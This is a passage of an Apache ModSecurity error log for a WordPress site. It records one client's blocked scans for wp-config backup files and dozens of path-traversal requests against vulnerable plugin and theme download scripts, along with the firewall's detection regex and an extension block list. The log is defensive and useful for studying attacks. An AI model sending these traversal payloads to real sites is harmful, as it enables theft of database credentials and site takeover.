.mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "ZN-xCUWc94tsnIsHAQ-YHQAAANc"] [Fri Aug 18 12:57:29.292063 2023] [:error] [pid 18872:tid 140103343126272] [client 87.249.132.213:35984] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.cfg"] [unique_id "ZN-xCfG_rKmCSnA6LxD5pwAAAAo"] [Fri Aug 18 12:58:32.962548 2023] [:error] [pid 18873:tid 140103301162752] [client 87.249.132.213:36204] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php%3A%2F%2Ffilter%2Fresource%3D..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZN-xSLCcrCl0jrDdhfxXfgAAAE8"] [Fri Aug 18 12:58:33.069927 2023] [:error] [pid 19445:tid 140103465973504] [client 87.249.132.213:36206] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZN-xSUWc94tsnIsHAQ-YVAAAAMQ"] [Fri Aug 18 12:58:33.967339 2023] [:error] [pid 19445:tid 140103474366208] [client 87.249.132.213:36210] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZN-xSUWc94tsnIsHAQ-YVQAAAMM"] [Fri Aug 18 12:58:38.173283 2023] [:error] [pid 19445:tid 140103301162752] [client 87.249.132.213:36222] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/force-download.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/force-download.php"] [unique_id "ZN-xTkWc94tsnIsHAQ-YVgAAAM8"] [Fri Aug 18 12:58:39.146669 2023] [:error] [pid 19445:tid 140103457580800] [client 87.249.132.213:36226] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /mdocs-posts/?mdocs-img-preview=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/mdocs-posts/"] [unique_id "ZN-xT0Wc94tsnIsHAQ-YVwAAAMU"] [Fri Aug 18 12:58:42.076082 2023] [:error] [pid 18874:tid 140103326340864] [client 87.249.132.213:36236] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F&filename=wp-config.php&action=download"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "ZN-xUlxvK4MFoveIP9_LNQAAAIw"] [Fri Aug 18 12:58:42.985026 2023] [:error] [pid 19445:tid 140103368304384] [client 87.249.132.213:36240] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/plugin-newsletter/preview.php?data=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/plugin-newsletter/preview.php"] [unique_id "ZN-xUkWc94tsnIsHAQ-YWAAAAMc"] [Fri Aug 18 12:58:43.079578 2023] [:error] [pid 18874:tid 140103250806528] [client 87.249.132.213:36242] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php"] [unique_id "ZN-xU1xvK4MFoveIP9_LNwAAAJU"] [Fri Aug 18 12:58:43.187201 2023] [:error] [pid 18874:tid 140103499544320] [client 87.249.132.213:36244] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?mdocs-img-preview=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZN-xU1xvK4MFoveIP9_LOAAAAIA"] [Fri Aug 18 12:58:44.148088 2023] [:error] [pid 18873:tid 140103317948160] [client 87.249.132.213:36248] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?path=..%2F..%2F&filename=wp-config.php&action=download"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "ZN-xVLCcrCl0jrDdhfxXgwAAAE0"] [Fri Aug 18 12:58:44.244647 2023] [:error] [pid 18872:tid 140103234021120] [client 87.249.132.213:36250] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?filename=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "ZN-xVPG_rKmCSnA6LxD5rwAAABc"] [Fri Aug 18 12:58:44.338962 2023] [:error] [pid 19445:tid 140103351518976] [client 87.249.132.213:36252] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-includes/plugins/wp-mobile-detector/resize.php?src=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-includes/plugins/wp-mobile-detector/resize.php"] [unique_id "ZN-xVEWc94tsnIsHAQ-YWgAAAMk"] [Fri Aug 18 12:58:44.435811 2023] [:error] [pid 18874:tid 140103474366208] [client 87.249.132.213:36254] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php"] [unique_id "ZN-xVFxvK4MFoveIP9_LOQAAAIM"] [Fri Aug 18 12:58:44.549861 2023] [:error] [pid 18874:tid 140103309555456] [client 87.249.132.213:36256] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?mdocs-img-preview=..%2F..%2F..-%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZN-xVFxvK4MFoveIP9_LOgAAAI4"] [Fri Aug 18 12:58:44.644893 2023] [:error] [pid 18874:tid 140103275984640] [client 87.249.132.213:36258] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB%40intermal.com&f=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZN-xVFxvK4MFoveIP9_LOwAAAJI"] [Fri Aug 18 12:58:44.739713 2023] [:error] [pid 18874:tid 140103259199232] [client 87.249.132.213:36260] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?filename=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "ZN-xVFxvK4MFoveIP9_LPAAAAJQ"] [Fri Aug 18 12:58:44.834335 2023] [:error] [pid 18874:tid 140103376697088] [client 87.249.132.213:36262] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/modules/Miranda.class.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/modules/Miranda.class.php"] [unique_id "ZN-xVFxvK4MFoveIP9_LPQAAAIY"] [Fri Aug 18 12:58:44.929334 2023] [:error] [pid 18874:tid 140103351518976] [client 87.249.132.213:36264] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "ZN-xVFxvK4MFoveIP9_LPgAAAIk"] [Fri Aug 18 12:58:45.023922 2023] [:error] [pid 18874:tid 140103301162752] [client 87.249.132.213:36266] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sell-downloads/sell-downloads.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F.%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sell-downloads/sell-downloads.php"] [unique_id "ZN-xVVxvK4MFoveIP9_LPwAAAI8"] [Fri Aug 18 12:58:45.138646 2023] [:error] [pid 18872:tid 140103368304384] [client 87.249.132.213:36268] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "ZN-xVfG_rKmCSnA6LxD5sAAAAAc"] [Fri Aug 18 12:58:45.247220 2023] [:error] [pid 19445:tid 140103376697088] [client 87.249.132.213:36270] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] 